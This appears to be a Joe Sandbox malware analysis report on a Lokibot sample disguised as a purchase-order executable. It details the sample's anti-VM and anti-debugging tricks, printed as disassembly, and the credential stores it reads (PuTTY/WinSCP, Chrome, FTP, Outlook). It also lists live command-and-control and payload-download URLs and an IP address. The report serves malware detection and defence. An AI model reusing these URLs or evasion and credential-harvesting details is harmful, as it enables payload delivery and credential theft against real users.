              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX

              Malware Analysis System Evasion:

              barindex
              Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC6F5E NtWriteVirtualMemory,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC6F06 NtWriteVirtualMemory,
              Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000002BC70A5 second address: 0000000002BC70A5 instructions:
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000002BC7263 second address: 0000000002BC7263 instructions:
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000002BC6D02 second address: 0000000002BC6D02 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F0FBC787E78h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dx, bx 0x00000020 add edi, edx 0x00000022 cmp ax, cx 0x00000025 dec dword ptr [ebp+000000F8h] 0x0000002b cmp dword ptr [ebp+000000F8h], 00000000h 0x00000032 jne 00007F0FBC787E55h 0x00000034 nop 0x00000035 call 00007F0FBC787EAAh 0x0000003a call 00007F0FBC787E88h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
              Tries to detect Any.runShow sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: C:\Program Files\qga\qga.exe
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: C:\Program Files\qga\qga.exe
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: PO-A2174679-06.exe, PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
              Tries to detect virtualization through RDTSC time measurementsShow sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000002BC70A5 second address: 0000000002BC70A5 instructions:
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000002BC7263 second address: 0000000002BC7263 instructions:
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000002BC6D02 second address: 0000000002BC6D02 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F0FBC787E78h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dx, bx 0x00000020 add edi, edx 0x00000022 cmp ax, cx 0x00000025 dec dword ptr [ebp+000000F8h] 0x0000002b cmp dword ptr [ebp+000000F8h], 00000000h 0x00000032 jne 00007F0FBC787E55h 0x00000034 nop 0x00000035 call 00007F0FBC787EAAh 0x0000003a call 00007F0FBC787E88h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000002BC6D22 second address: 0000000002BC6D22 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F0FBC870ADEh 0x0000001d popad 0x0000001e call 00007F0FBC87053Ah 0x00000023 lfence 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000000566D22 second address: 0000000000566D22 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F0FBC78853Eh 0x0000001d popad 0x0000001e call 00007F0FBC787F9Ah 0x00000023 lfence 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC0977 rdtsc
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeWindow / User API: threadDelayed 1628
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe TID: 6576Thread sleep count: 1628 > 30
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe TID: 4504Thread sleep time: -120000s >= -30000s
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe TID: 4504Thread sleep time: -60000s >= -30000s
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeThread sleep count: Count: 1628 delay: -5
              Source: PO-A2174679-06.exe, 0000000B.00000002.501778520.0000000000A67000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWayer LightWeight Filter-0000
              Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
              Source: PO-A2174679-06.exe, PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

              Anti Debugging:

              barindex
              Contains functionality to hide a thread from the debuggerShow sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC0699 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?
              Hides threads from debuggersShow sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeThread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeThread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeThread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC0977 rdtsc
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC4291 NtSetInformationThread,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC72EF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC641D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC7604 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC27A1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC35F2 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC35EC mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC1F69 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC6963 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC754F mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess created: C:\Users\user\Desktop\PO-A2174679-06.exe 'C:\Users\user\Desktop\PO-A2174679-06.exe'
              Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
              Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
              Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC36C7 cpuid
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

              Remote Access Functionality:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Masquerading1OS Credential Dumping2Security Software Discovery721Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion23Input Capture1Virtualization/Sandbox Evasion23Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Credentials in Registry1Process Discovery1SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelData from Local System2Scheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery323VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              PO-A2174679-06.exe16%VirustotalBrowse
              PO-A2174679-06.exe2%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              accessasia.com.hk0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://accessasia.com.hk/ovation/five/fre.php0%Avira URL Cloudsafe
              http://sinatrasmob.com/pro/ovation_byHOXsph232.bin0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              accessasia.com.hk
              		192.185.78.145
              		truetrueunknown
              onedrive.live.com
              		unknown
              		unknownfalse
                		high
                hrf0ga.bn.files.1drv.com
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://accessasia.com.hk/ovation/five/fre.phptrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://cdn.discordapp.com/attachments/813514912135380996/813514973141532722/ovation_byHOXsph232.binPO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpfalse
                    		high
                    https://onedrive.live.com/nPO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmpfalse
                      		high
                      https://onedrive.live.com/download?cid=B1076D30E2A6430F&resid=B1076D30E2A6430F%21110&authkey=AO3GCQaPO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpfalse
                        		high
                        https://onedrive.live.com/PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmpfalse
                          		high
                          https://hrf0ga.bn.files.1drv.com/PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmpfalse
                            		high
                            http://sinatrasmob.com/pro/ovation_byHOXsph232.binPO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            192.185.78.145
                            		unknownUnited States
                            		46606UNIFIEDLAYER-AS-1UStrue

                            General Information

                            Joe Sandbox Version:31.0.0 Emerald
                            Analysis ID:356484
                            Start date:23.02.2021
                            Start time:08:47:07
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 7m 13s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:PO-A2174679-06.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:23
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/2@43/1
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 3.7% (good quality ratio 1%)
                            • Quality average: 10%
                            • Quality standard deviation: 17.1%
                            HCA Information:
                            • Successful, ratio: 70%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                            • HTTP Packets have been reduced
                            • TCP Packets have been reduced to 100
                            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 93.184.220.29, 168.61.161.212, 51.104.139.180, 51.103.5.186, 52.147.198.201, 23.218.209.198, 13.88.21.125, 92.122.145.220, 40.88.32.150, 23.218.208.56, 51.11.168.160, 8.253.204.249, 8.248.117.254, 67.26.73.254, 8.253.204.120, 8.248.133.254, 92.122.213.247, 92.122.213.194, 13.107.42.13, 13.107.43.12, 52.155.217.156, 20.54.26.129
                            • Excluded domains from analysis (whitelisted): odc-bn-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, odc-bn-files-geo.onedrive.akadns.net, skypedataprdcoleus15.cloudapp.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, odc-bn-files-brs.onedrive.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, odc-web-brs.onedrive.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, l-0004.l-msedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, displaycatalog.mp.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, 